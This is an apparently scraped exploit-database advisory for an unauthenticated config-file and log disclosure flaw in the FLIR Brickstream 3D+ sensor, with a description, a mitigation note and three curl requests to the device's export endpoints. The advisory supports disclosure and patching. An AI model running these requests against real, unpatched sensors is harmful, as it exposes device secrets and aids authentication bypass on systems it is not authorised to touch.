FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure

vendor:

FLIR Brickstream 3D+

by:

Gjoko 'LiquidWorm' Krstic

8.8

CVSS

HIGH

Unauthenticated Config Download and File Disclosure

200

CWE

Product Name: FLIR Brickstream 3D+

Affected Version From: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47

Affected Version To: Titan, Api/1.0.0

Patch Exists: YES

Related CWE: ZSL-2018-5495

CPE: h:flir:brickstream_3d+

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

FLIR Brickstream 3D+ 2.1.742.1842 – Config File Disclosure

The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config download and file disclosure vulnerability when calling the ExportConfig REST API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access.

Mitigation:

Ensure that the system is configured to require authentication before allowing access to the ExportConfig REST API.

Source

Exploit-DB raw data:

# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.brickstream.com
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
# Tested on: Titan, Api/1.0.0
# References:
# ZSL-2018-5495
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php

# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
# download and file disclosure vulnerability when calling the ExportConfig REST
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
# information and help her in authentication bypass, privilege escalation and/or
# full system access.

$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs